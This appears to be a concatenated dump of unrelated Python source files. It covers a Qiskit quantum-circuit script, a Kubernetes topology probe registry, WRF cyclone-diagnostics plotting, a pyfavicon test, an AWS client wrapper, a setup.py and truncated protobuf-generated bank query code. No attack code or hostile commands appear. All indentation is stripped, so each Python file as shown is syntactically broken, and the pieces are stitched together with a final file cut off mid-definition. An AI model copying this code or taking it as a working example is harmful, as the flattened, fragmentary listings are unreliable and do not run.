prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[4]) # number=46
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=53
prog.cz(input_qubit[0],input_qubit[2]) # number=54
prog.h(input_qubit[2]) # number=55
prog.cx(input_qubit[0],input_qubit[2]) # number=56
prog.x(input_qubit[2]) # number=57
prog.cx(input_qubit[0],input_qubit[2]) # number=58
prog.h(input_qubit[2]) # number=47
prog.cz(input_qubit[0],input_qubit[2]) # number=48
prog.h(input_qubit[2]) # number=49
prog.rx(-1.9697785938008003,input_qubit[1]) # number=37
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit1715.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
py | b414e74ae421f14965c6e966091b96bde22167db | # Copyright 2020 OpenRCA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orca.topology import bundle
from orca.topology.infra.istio import linker as istio_linker
from orca.topology.infra.k8s import cluster, linker, probe
def get_probes():
return [
bundle.ProbeBundle(
probe=probe.PodPullProbe,
linkers=[
linker.PodToServiceLinker,
linker.PodToReplicaSetLinker,
linker.PodToStatefulSetLinker,
linker.PodToDaemonSetLinker,
linker.PodToNodeLinker,
linker.ConfigMapToPodLinker,
linker.SecretToPodLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.PodPushProbe,
linkers=[
linker.PodToServiceLinker,
linker.PodToReplicaSetLinker,
linker.PodToStatefulSetLinker,
linker.PodToDaemonSetLinker,
linker.PodToNodeLinker,
linker.ConfigMapToPodLinker,
linker.SecretToPodLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.ServicePullProbe,
linkers=[
linker.PodToServiceLinker,
linker.EndpointsToServiceLinker,
istio_linker.VirtualServiceToServiceLinker,
istio_linker.DestinationRuleToServiceLinker,
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.ServicePushProbe,
linkers=[
linker.PodToServiceLinker,
linker.EndpointsToServiceLinker,
istio_linker.VirtualServiceToServiceLinker,
istio_linker.DestinationRuleToServiceLinker,
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.EndpointsPullProbe,
linkers=[
linker.EndpointsToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.EndpointsPushProbe,
linkers=[
linker.EndpointsToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.DeploymentPullProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToDeploymentLinker
]
),
bundle.ProbeBundle(
probe=probe.DeploymentPushProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToDeploymentLinker
]
),
bundle.ProbeBundle(
probe=probe.ReplicaSetPullProbe,
linkers=[
linker.PodToReplicaSetLinker,
linker.ReplicaSetToDeploymentLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.ReplicaSetPushProbe,
linkers=[
linker.PodToReplicaSetLinker,
linker.ReplicaSetToDeploymentLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.DaemonSetPullProbe,
linkers=[
linker.PodToDaemonSetLinker
]
),
bundle.ProbeBundle(
probe=probe.DaemonSetPushProbe,
linkers=[
linker.PodToDaemonSetLinker
]
),
bundle.ProbeBundle(
probe=probe.StatefulSetPullProbe,
linkers=[
linker.PodToStatefulSetLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.StatefulSetPushProbe,
linkers=[
linker.PodToStatefulSetLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.ConfigMapPullProbe,
linkers=[
linker.ConfigMapToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.ConfigMapPushProbe,
linkers=[
linker.ConfigMapToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.SecretPullProbe,
linkers=[
linker.SecretToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.SecretPushProbe,
linkers=[
linker.SecretToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.StorageClassPullProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker
]
),
bundle.ProbeBundle(
probe=probe.StorageClassPushProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumePullProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker,
linker.PersistentVolumeToPersistentVolumeClaimLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumePushProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker,
linker.PersistentVolumeToPersistentVolumeClaimLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumeClaimPullProbe,
linkers=[
linker.PersistentVolumeToPersistentVolumeClaimLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumeClaimPushProbe,
linkers=[
linker.PersistentVolumeToPersistentVolumeClaimLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.HorizontalPodAutoscalerPullProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.HorizontalPodAutoscalerPushProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.NodePullProbe,
linkers=[
linker.PodToNodeLinker,
linker.NodeToClusterLinker
]
),
bundle.ProbeBundle(
probe=probe.NodePushProbe,
linkers=[
linker.PodToNodeLinker,
linker.NodeToClusterLinker
]
),
bundle.ProbeBundle(
probe=probe.IngressPullProbe,
linkers=[
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.IngressPushProbe,
linkers=[
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=cluster.ClusterProbe,
linkers=[
linker.NodeToClusterLinker
]
)
]
|
py | b414e7e0bbfe363bbfa09a5ebd9184a4f2ae310f | #!/bin/python
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import Ngl,Nio
from diag_functions import *
def get_PI_year(case, year):
data_dir="~/PROJ_WRF/%s/%s/"
post_file="wrfpost_%s_%s_%s.nc"
tstorms_file="wrf_tstorms_%s_%s.nc"
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,"01"))
temp_tfile=Nio.open_file(data_dir %(case,year) + tstorms_file %(case,year))
T_200=np.mean(temp_tfile.variables["T200"].get_value(),axis=0)[:,:]
T_sfc=np.mean(temp_pfile.variables["T_sfc_monthly"].get_value(),axis=0)[:,:]
LH=np.mean(temp_pfile.variables["LH_monthly"].get_value(),axis=0)[:,:]
#T_2m=np.mean(temp_pfile.variables["T_2m_daily"].get_value(),axis=0)[:,:]
F_up=np.mean(temp_pfile.variables["LW_u_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_u_monthly"].get_value(),axis=0)[:,:]
F_down=np.mean(temp_pfile.variables["LW_d_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_d_monthly"].get_value(),axis=0)[:,:]
#P_sfc=np.mean(temp_pfile.variables["p_sfc_monthly"].get_value(),axis=0)[:,:]
#V_sfc=np.sqrt(np.mean(temp_tfile.variables["UBOT"].get_value(),axis=0)[:,:]**2+np.mean(temp_tfile.variables["VBOT"].get_value(),axis=0)[:,:]**2)
for i in range(2,13):
if i<10: month="0"+str(i)
else: month=str(i)
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,month))
T_sfc+=np.mean(temp_pfile.variables["T_sfc_monthly"].get_value(),axis=0)[:,:]
LH+=np.mean(temp_pfile.variables["LH_monthly"].get_value(),axis=0)[:,:]
#T_2m+=np.mean(temp_pfile.variables["T_2m_daily"].get_value(),axis=0)[:,:]
F_up+=np.mean(temp_pfile.variables["LW_u_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_u_monthly"].get_value(),axis=0)[:,:]
F_down+=np.mean(temp_pfile.variables["LW_d_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_d_monthly"].get_value(),axis=0)[:,:]
#P_sfc+=np.mean(temp_pfile.variables["p_sfc_monthly"].get_value(),axis=0)[:,:]
T_sfc[:,:]=T_sfc[:,:]/12.0
F_down[:,:]=F_down[:,:]/12.0
F_up[:,:]=F_up[:,:]/12.0
#P_sfc[:,:]=P_sfc[:,:]/12.0
LH[:,:]=LH[:,:]/12.0
#T_2m[:,:]=T_2m/12.0
#return (T_sfc[:,:]-T_200[:,:])/T_sfc[:,:]*LH[:,:]
#return (T_sfc[:,:]-T_200[:,:])/T_sfc[:,:]*(T_sfc[:,:]-T_2m[:,:])
#return (T_sfc[:,:]-T_200[:,:])/(P_sfc[:,:]*V_sfc[:,:])*(F_down[:,:]-F_up[:,:])
return (T_sfc[:,:]-T_200[:,:])/T_200[:,:]*(F_down[:,:]-F_up[:,:]+LH[:,:])
def get_lat_lon(case,year):
data_dir="~/PROJ_WRF/%s/%s/"
post_file="wrfpost_%s_%s_%s.nc"
tstorms_file="wrf_tstorms_%s_%s.nc"
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,"01"))
lat=temp_pfile.variables["lat"].get_value()[:]
lon=temp_pfile.variables["lon"].get_value()[:]
return lat,lon
def get_PI_chunk(case,start,end):
PI_tmp=get_PI_year(case,start)
for i in range(start+1,end+1):
PI_tmp+=get_PI_year(case,i)
return PI_tmp[:,:]/float(end-start+1)
def get_PI_frac(PI_ctrl,PI_forced):
#return PI_forced[:,:]/PI_ctrl[:,:]-1.0
return np.sqrt(PI_forced[:,:]/PI_ctrl[:,:])-1.0
def plot_num_fig(tcfilename1,tcfilename2,start_year,end_year,
min_lat,max_lat,lat_res,min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,min_ace,max_ace,ace_res,
outer_grid=gridspec.GridSpec(1,1,wspace=0.0,hspace=0.0)[0],
fig=plt.figure(1), title=None):
[months,monthly_num,
years,yearly_num,
lats,lat_num,
lons,lon_num,
intsys,intsy_num,
press,pres_num,
durs,wdurd_num,
pdurd_num,
pdis,pdi_num,
aces,ace_num] = get_all_diags(tcfilename1,start_year,end_year,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,
min_ace,max_ace,ace_res)
[months,monthly_num2,
years,yearly_num2,
lats,lat_num2,
lons,lon_num2,
intsys,intsy_num2,
press,pres_num2,
durs,wdurd_num2,
pdurd_num2,
pdis,pdi_num2,
aces,ace_num2] = get_all_diags(tcfilename2,start_year,end_year,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,
min_ace,max_ace,ace_res)
#----------------plotting---------------------#
fig_rows=5
fig_cols=2
plt.rc('font',size=7)
plt.rc('axes', titlesize=7)
inner_grid = gridspec.GridSpecFromSubplotSpec(fig_rows, fig_cols,
subplot_spec=outer_grid, wspace=0.6, hspace=0.9)
if title: fig.suptitle(title)
ax = plt.Subplot(fig,inner_grid[0])
#ax.bar(months,monthly_num,1,align='center')
l1,l2=ax.plot(months,monthly_num/np.sum(monthly_num),'r',months,monthly_num2/np.sum(monthly_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(months,monthly_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Month")
plt.xlim([1,12])
ax = plt.Subplot(fig,inner_grid[1])
#ax.bar(years,yearly_num,1,align='center')
ax.plot(years,yearly_num,'r',years,yearly_num2,'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu_{num}=$'+str(avg_vert(years,yearly_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
#plt.annotate(r'$\mu_{year}=$'+str(avg_hori(years,yearly_num)), \
# xy=(0.05,0.55),xycoords='axes fraction')
plt.title("Year")
plt.xlim([start_year,end_year])
ax = plt.Subplot(fig,inner_grid[2])
#ax.bar(lats,lat_num,lat_res,align='center')
ax.plot(lats,lat_num/np.sum(lat_num),'r',lats,lat_num2/np.sum(lat_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(lats,lat_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Latitude")
plt.xlim([min_lat,max_lat])
ax = plt.Subplot(fig,inner_grid[3])
#ax.bar(lons,lon_num,lon_res,align='center')
ax.plot(lons,lon_num/np.sum(lon_num),'r',lons,lon_num2/np.sum(lon_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(lons,lon_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Longitude")
plt.xlim([min_lon,max_lon])
ax = plt.Subplot(fig,inner_grid[4])
#ax.bar(intsys,intsy_num,int((max_wind-min_wind)/len(intsys)),align='center')
ax.plot(intsys,intsy_num/np.sum(intsy_num),'r',intsys,intsy_num2/np.sum(intsy_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(intsys,intsy_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Wind Speed (m/s)")
plt.xlim([min_wind,max_wind])
ax = plt.Subplot(fig,inner_grid[5])
#ax.bar(press,pres_num,int((max_press-min_press)/len(press)),align='center')
ax.plot(press[::-1],pres_num[::-1]/np.sum(pres_num[::-1]),'r',press[::-1],pres_num2[::-1]/np.sum(pres_num2[::-1]),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(press,pres_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Pressure (mb)")
plt.xlim([min_press,max_press])
ax = plt.Subplot(fig,inner_grid[6])
#ax.bar(durs,wdurd_num,6,align='center')
ax.plot(durs,wdurd_num/np.sum(wdurd_num),'r',durs,wdurd_num2/np.sum(wdurd_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(durs,wdurd_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Wind Life (hrs)")
plt.xlim([0,6*len(wdurd_num)])
ax = plt.Subplot(fig,inner_grid[7])
#ax.bar(durs,pdurd_num,6,align='center')
ax.plot(durs,pdurd_num/np.sum(pdurd_num),'r',durs,pdurd_num2/np.sum(pdurd_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(durs,pdurd_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Press Life (hrs)")
plt.xlim([0,6*len(pdurd_num)])
ax = plt.Subplot(fig,inner_grid[8])
ax.plot(pdis,pdi_num/np.sum(pdi_num),'r',pdis,pdi_num2/np.sum(pdi_num2),'b')
fig.add_subplot(ax)
plt.title("PDI ($m^3/s^2$)")
plt.xlim([min_pdi,max_pdi-5*pdi_res])
plt.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
ax = plt.Subplot(fig,inner_grid[9])
ax.plot(aces,ace_num/np.sum(ace_num),'r',aces,ace_num2/np.sum(ace_num2),'b')
fig.add_subplot(ax)
plt.title("ACE ($m^2/s^2$)")
plt.xlim([min_ace,max_ace-5*ace_res])
#plt.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
fig.legend((l1,l2),('ERAI','IBTrACS'),'upper left')
print("ERAI")
print("month avg: %s" %(avg_hori(months,monthly_num)))
print("yearly num avg: %s" %(avg_vert(years,yearly_num)))
print("lat avg: %s" %(avg_hori(lats,lat_num)))
print("lon avg: %s" %(avg_hori(lons,lon_num)))
print("max wind avg: %s" %(avg_hori(intsys,intsy_num)))
print("min press avg: %s" %(avg_hori(press,pres_num)))
print("w-life avg: %s" %(avg_hori(durs,wdurd_num)))
print("p-life avg: %s" %(avg_hori(durs,pdurd_num)))
print("pdi avg: %s" %(avg_hori(pdis,pdi_num)))
print("ace avg: %s" %(avg_hori(aces,ace_num)))
print("IBTRACS")
print("month avg: %s" %(avg_hori(months,monthly_num2)))
print("yearly num avg: %s" %(avg_vert(years,yearly_num2)))
print("lat avg: %s" %(avg_hori(lats,lat_num2)))
print("lon avg: %s" %(avg_hori(lons,lon_num2)))
print("max wind avg: %s" %(avg_hori(intsys,intsy_num2)))
print("min press avg: %s" %(avg_hori(press,pres_num2)))
print("w-life avg: %s" %(avg_hori(durs,wdurd_num2)))
print("p-life avg: %s" %(avg_hori(durs,pdurd_num2)))
print("pdi avg: %s" %(avg_hori(pdis,pdi_num2)))
print("ace avg: %s" %(avg_hori(aces,ace_num2)))
return fig
def plot_pval_fig(tcfilename1,tcfilename2,start_year,end_year,year_avg,ref_syear,
ref_eyear, min_lat,max_lat,lat_res,min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,min_press,max_press,press_res,
dur_days,
outer_grid=gridspec.GridSpec(1,1,wspace=0.0,hspace=0.0)[0],
fig=plt.figure(1), title=None):
[months,monthly_num2,
years2,yearly_num2,
lats,lat_num2,
lons,lon_num2,
intsys,intsy_num2,
press,pres_num2,
durs,wdurd_num2,
pdurd_num2] = get_all_diags(tcfilename2,ref_syear,ref_eyear,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days)
pm_vals=[]
pw_vals=[]
plat_vals=[]
plon_vals=[]
pp_vals=[]
pwdur_vals=[]
ppdur_vals=[]
years=[]
year_range = end_year-start_year+1
for i in range(year_range):
calc_year = start_year+i
years.append(calc_year)
[start_idx,end_idx] = running_range(year_range,year_avg,i)
syr = start_idx+start_year
eyr = end_idx+start_year
[months,monthly_num1,
years1,yearly_num1,
lats,lat_num1,
lons,lon_num1,
intsys,intsy_num1,
press,pres_num1,
durs,wdurd_num1,
pdurd_num1] = get_all_diags(tcfilename1,syr,eyr,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days)
[ Pm, Pw, Plat, Plon,
Pp, Pwdur, Ppdur ] = get_all_ks_tests(monthly_num1,monthly_num2,
intsy_num1,intsy_num2,
lat_num1,lat_num2,
lon_num1,lon_num2,
pres_num1,pres_num2,
wdurd_num1,wdurd_num2,
pdurd_num1,pdurd_num2)
pm_vals.append(Pm)
pw_vals.append(Pw)
plat_vals.append(Plat)
plon_vals.append(Plon)
pp_vals.append(Pp)
pwdur_vals.append(Pwdur)
ppdur_vals.append(Ppdur)
#----------------plotting---------------------#
fig_rows=4
fig_cols=2
inner_grid = gridspec.GridSpecFromSubplotSpec(fig_rows, fig_cols,
subplot_spec=outer_grid, wspace=0.5, hspace=0.6)
#inner_grid.update(left=0.2,right=0.9,top=0.9,bottom=0.15)
# plt.subplots_adjust(top=0.9,bottom=0.15,left=0.20,right=0.90,hspace=1.0,wspace=0.7)
plt.rc('font',size=6)
plt.rc('axes', titlesize=7)
if title: plt.suptitle(title)
ax = plt.Subplot(fig,inner_grid[0])
ax.plot(years,pm_vals)
fig.add_subplot(ax)
plt.title("month")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[1])
ax.plot(years,pw_vals)
fig.add_subplot(ax)
plt.title("wind")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[2])
ax.plot(years,plat_vals)
fig.add_subplot(ax)
plt.title("lat")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[3])
ax.plot(years,plon_vals)
fig.add_subplot(ax)
plt.title("lon")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[4])
ax.plot(years,pp_vals)
fig.add_subplot(ax)
plt.title("press")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[5])
ax.plot(years,pwdur_vals)
fig.add_subplot(ax)
plt.title("w-life")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[6])
ax.plot(years,ppdur_vals)
fig.add_subplot(ax)
plt.title("p-life")
plt.ylim(0.0,1.0)
return fig
|
py | b414e8896223eb3642e2e405d6fca49f53432a03 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
PYTHON_VERSION_COMPATIBILITY = "PY3"
DEPS = [
'recipe_engine/context',
'recipe_engine/file',
'recipe_engine/path',
'recipe_engine/step',
'run',
'vars',
]
|
py | b414e8ce7723ddb3ff16a92f2f7767be71312695 | from pyfavicon import Favicon
import pytest
GITLAB_FAVICONS = {
'https://about.gitlab.com/ico/favicon.ico': (-1, -1),
'https://about.gitlab.com/ico/favicon-192x192.png': (190, 175),
'https://about.gitlab.com/ico/favicon-160x160.png': (158, 145),
'https://about.gitlab.com/ico/favicon-96x96.png': (95, 87),
'https://about.gitlab.com/ico/favicon-16x16.png': (16, 14),
'https://about.gitlab.com/ico/favicon-32x32.png': (32, 29),
'https://about.gitlab.com/ico/apple-touch-icon-57x57.png': (57, 57),
'https://about.gitlab.com/ico/apple-touch-icon-114x114.png': (114, 114),
'https://about.gitlab.com/ico/apple-touch-icon-72x72.png': (72, 72),
'https://about.gitlab.com/ico/apple-touch-icon-144x144.png': (144, 144),
'https://about.gitlab.com/ico/apple-touch-icon-60x60.png': (60, 60),
'https://about.gitlab.com/ico/apple-touch-icon-120x120.png': (120, 120),
'https://about.gitlab.com/ico/apple-touch-icon-76x76.png': (76, 76),
'https://about.gitlab.com/ico/apple-touch-icon-152x152.png': (152, 152),
'https://about.gitlab.com/ico/apple-touch-icon-180x180.png': (180, 180),
'https://about.gitlab.com/ico/mstile-144x144.png': (144, 144)
}
favicon = Favicon()
@pytest.mark.asyncio
async def test_icon_size():
icons = await favicon.from_url('https://gitlab.com')
assert len(icons) != 0
for icon in icons:
assert GITLAB_FAVICONS[str(icon.link)] == icon.size
largest = icons.get_largest(extension='png')
assert largest.size == (190, 175)
assert largest.extension == 'png'
|
py | b414e8ea7977c874a186002bab8e5cfded1c4786 | import copy
text = [el for el in input()]
deepcopy_list = copy.deepcopy(text)
answer = []
previous_el = deepcopy_list[0]
to_add = 0
index = 0
while not deepcopy_list == []:
if previous_el == ">":
previous_el = deepcopy_list[0]
index -= 1
explosion = int(deepcopy_list[0])
if to_add > 0:
explosion += to_add
while not deepcopy_list[0] == ">":
deepcopy_list.pop(0)
explosion -= 1
if explosion == 0:
break
if deepcopy_list == []:
break
if explosion > 0:
to_add += explosion
else:
answer.append(deepcopy_list[0])
deepcopy_list.remove(deepcopy_list[0])
previous_el = answer[index]
index += 1
print("".join(answer))
|
py | b414ea68c975064cc09e00952a9eca95982e5f92 | from typing import Union, Optional
from mason.clients.base import Client
from mason.engines.metastore.models.credentials import InvalidCredentials
from mason.engines.metastore.models.credentials.aws import AWSCredentials
class AWSClient(Client):
def __init__(self, access_key: str, secret_key: str, aws_region: str, aws_role_arn: Optional[str] = None):
self.access_key = access_key
self.secret_key = secret_key
self.aws_region = aws_region
self.aws_role_arn = aws_role_arn
def to_dict(self) -> dict:
return {
"client_name": super().name(),
"access_key": "REDACTED",
"secret_key": "REDACTED",
"aws_region": self.aws_region,
"aws_role_arn": self.aws_role_arn
}
def credentials(self) -> Union[AWSCredentials, InvalidCredentials]:
if self.access_key and self.secret_key:
return AWSCredentials(self.access_key, self.secret_key)
else:
return InvalidCredentials("AWS Credentials Undefined.")
|
py | b414eab6969443613bc335e0f9e7e8e5e651f6ed | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zenora",
version="0.0.20",
author="K.M Ahnaf Zamil",
author_email="[email protected]",
description="A modern Discord REST API wrapper that allows you to access the data without running a bot.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ahnaf-zamil/zenora",
packages=["zenora", "zenora.impl", "zenora.base", "zenora.utils"],
install_requires=[
"attrs",
"requests",
"typing",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
) |
py | b414ebd835919000f4372d9dddb2b2453a2b445f | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cosmos/bank/v1beta1/query.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from cosmos.base.query.v1beta1 import pagination_pb2 as cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2
from gogoproto import gogo_pb2 as gogoproto_dot_gogo__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from cosmos.base.v1beta1 import coin_pb2 as cosmos_dot_base_dot_v1beta1_dot_coin__pb2
from cosmos.bank.v1beta1 import bank_pb2 as cosmos_dot_bank_dot_v1beta1_dot_bank__pb2
from cosmos_proto import cosmos_pb2 as cosmos__proto_dot_cosmos__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cosmos/bank/v1beta1/query.proto',
package='cosmos.bank.v1beta1',
syntax='proto3',
serialized_options=b'Z)github.com/cosmos/cosmos-sdk/x/bank/types',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1f\x63osmos/bank/v1beta1/query.proto\x12\x13\x63osmos.bank.v1beta1\x1a*cosmos/base/query/v1beta1/pagination.proto\x1a\x14gogoproto/gogo.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x1e\x63osmos/base/v1beta1/coin.proto\x1a\x1e\x63osmos/bank/v1beta1/bank.proto\x1a\x19\x63osmos_proto/cosmos.proto\"Y\n\x13QueryBalanceRequest\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12\r\n\x05\x64\x65nom\x18\x02 \x01(\t:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"B\n\x14QueryBalanceResponse\x12*\n\x07\x62\x61lance\x18\x01 \x01(\x0b\x32\x19.cosmos.base.v1beta1.Coin\"\x8a\x01\n\x17QueryAllBalancesRequest\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12:\n\npagination\x18\x02 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"\xb6\x01\n\x18QueryAllBalancesResponse\x12]\n\x08\x62\x61lances\x18\x01 \x03(\x0b\x32\x19.cosmos.base.v1beta1.CoinB0\xc8\xde\x1f\x00\xaa\xdf\x1f(github.com/cosmos/cosmos-sdk/types.Coins\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"_\n\x17QueryTotalSupplyRequest\x12:\n\npagination\x18\x01 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"\xb4\x01\n\x18QueryTotalSupplyResponse\x12[\n\x06supply\x18\x01 \x03(\x0b\x32\x19.cosmos.base.v1beta1.CoinB0\xc8\xde\x1f\x00\xaa\xdf\x1f(github.com/cosmos/cosmos-sdk/types.Coins\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"%\n\x14QuerySupplyOfRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\"H\n\x15QuerySupplyOfResponse\x12/\n\x06\x61mount\x18\x01 \x01(\x0b\x32\x19.cosmos.base.v1beta1.CoinB\x04\xc8\xde\x1f\x00\"\x14\n\x12QueryParamsRequest\"H\n\x13QueryParamsResponse\x12\x31\n\x06params\x18\x01 \x01(\x0b\x32\x1b.cosmos.bank.v1beta1.ParamsB\x04\xc8\xde\x1f\x00\"X\n\x1aQueryDenomsMetadataRequest\x12:\n\npagination\x18\x01 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest\"\x92\x01\n\x1bQueryDenomsMetadataResponse\x12\x36\n\tmetadatas\x18\x01 \x03(\x0b\x32\x1d.cosmos.bank.v1beta1.MetadataB\x04\xc8\xde\x1f\x00\x12;\n\npagination\x18\x02 